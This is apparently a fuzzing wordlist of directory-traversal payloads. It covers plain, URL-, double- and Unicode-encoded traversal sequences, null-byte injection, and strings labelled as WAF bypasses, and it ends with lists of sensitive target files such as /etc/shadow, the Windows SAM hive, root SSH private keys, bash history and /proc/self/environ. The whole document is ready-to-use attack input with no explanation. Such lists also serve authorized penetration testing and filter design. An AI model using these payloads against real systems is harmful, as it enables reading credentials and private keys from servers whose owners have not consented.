# Basic Directory Traversal
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../

# Double Encoded Traversal
%252e%252e%252f
%252e%252e/
..%252f
%252e%252e%255c
..%255c
..%c0%af
..%c1%9c

# URL Encoded Traversal
%2e%2e%2f
%2e%2e/
%2e%2e%5c
..%2f
..%5c
%2e%2e\
..\

# Unicode Encoded Traversal
..%u2215
..%u2216
..%uFF0F
..%u2215
..%u2216
..%c0%af
..%c0%5c
..%c1%9c

# Mixed Encoding Traversal
....//
....\\
..../\
....\/
....\x2F
....%2F
....%5C

# OS Specific Traversal
# Windows
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\

# Common Target Files (Windows)
C:/Windows/System32/drivers/etc/hosts
C:/Windows/System32/config/SAM
C:/Windows/repair/SAM
C:/Windows/System32/config/RegBack/SAM
C:/Windows/System32/config/system
C:/Windows/repair/system
C:/Windows/System32/config/RegBack/system
C:/boot.ini
C:/autoexec.bat
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/Panther/unattend.xml
C:/Windows/Panther/unattend/unattend.xml
C:/Windows/system32/eula.txt
C:/Windows/system32/license.rtf

# Common Target Files (Linux/Unix)
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/mysql/my.cnf
/etc/mysql/my.ini
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/php/php.ini
/etc/php.ini
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/mail.log
/var/log/syslog
/var/log/auth.log
/.bash_history
/.bash_profile
/.bashrc
/.ssh/id_rsa
/.ssh/id_rsa.pub
/.ssh/authorized_keys
/.ssh/known_hosts
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys

# Null Byte Injection
../../../etc/passwd%00
../../../etc/shadow%00
..%00/
..%00\
%00../../
%00/../../
%00\../../

# WAF Bypass Techniques
....//....//....//
....\\....\\....\\
..../\..../\..../\
....\/....\/....\/
....%2F....%2F....%2F
....%5C....%5C....%5C
%252e%252e%252f%252e%252e%252f
..%c0%af..%c0%af..%c0%af
..%c1%9c..%c1%9c..%c1%9c

# Path Normalization
.//..//
//..//..
.//.//..//
././././
/./././.
.\\.\\.\\.
.\\./\\.\\

# Special Characters
.%2e/%2e%2e/
.%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f
.%252e/%252e%252e/
%252e%252e/%252e%252e/
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

# Nested Traversal
....//....//....//etc/passwd
....//....//....//etc/shadow
....\\....\\....\\Windows\\System32\\config\\SAM
....//....//....//proc/self/environ

# Complex Combinations
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
....//....//....//....//etc/passwd
%25%32%65%25%32%65%25%32%66etc%25%32%66passwd 